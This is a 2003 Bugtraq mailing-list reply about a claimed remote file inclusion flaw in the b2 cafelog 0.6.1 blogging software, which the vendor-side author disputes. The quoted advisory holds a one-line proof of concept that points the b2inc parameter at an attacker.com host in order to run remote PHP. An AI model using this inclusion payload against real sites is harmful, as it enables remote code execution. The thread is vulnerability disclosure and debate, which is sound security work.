Bugtraq mailing list archives
Re: b2 cafelog 0.6.1 remote command execution.
From: mike little <mike () zed1 com>
Date: Fri, 30 May 2003 07:35:04 +0100
pokleyzz wrote:
Products: b2 cafelog 0.6.1 (http://cafelog.com/) Date: 29 May 2003 Author: pokleyzz <pokleyzz_at_scan-associates.net> Contributors: sk_at_scan-associates.net shaharil_at_scan-associates.net munir_at_scan-associates.net URL: http://www.scan-associates.net Summary: b2 cafelog 0.6.1 remote command execution. Description =========== b2 cafelog is blogger system written in php with mysql ad database backend. Details =======b2 cafelog 0.6.1 come with directory b2-tools. This directory contain 2 php scripts (blogger-2-b2.php and gm-2-b2.php) which allow user to specify $b2inc and doremote code injection.from blogger-2-b2.php line 21 -----------------------------------------------------case "step1": include("b2config.php"); include("$b2inc/b2functions.php"); include("$b2inc/b2vars.php");------------------------------------------------------------------------------------from gm-2-b2.php line 5 ----------------------------------------------------------// 3. load in the browser from there include("b2config.php"); include($b2inc."/b2functions.php");-----------------------------------------------------------------------------------Proof of concept =========== http://blabla.com/b2-tools/gm-2-b2.php?b2inc=http://attacker.com attacker.com have file named b2functions.php with php script you want to execute. Workaround ========= Remove b2-tools directory. Vendor Response =============== Vendor has been contacted on 19/05/2003 but to reply given.
Firstly, the issue has been addressed http://tidakada.com/board/viewtopic.php?t=3212
and a new version issued http://tidakada.com/board/viewtopic.php?t=3234Secondly, has anyone tried this? The fact is that b2config.php defines $b2inc with no test before hand. So that, whilst for the duration of the parsing of b2config.php, $b2inc could indeed be set to some value from the outside world. It is immediately overwritten with no check with the value set by the user (or left from the defalut installation). In order to effectively use the setting of b2inc for malicious purposes you would have to have enough access to edit b2config.php.
Mike
Current thread:
- Re: b2 cafelog 0.6.1 remote command execution. mike little (Jun 01)
- Re: b2 cafelog 0.6.1 remote command execution. Cheng-Jih Chen (Jun 03)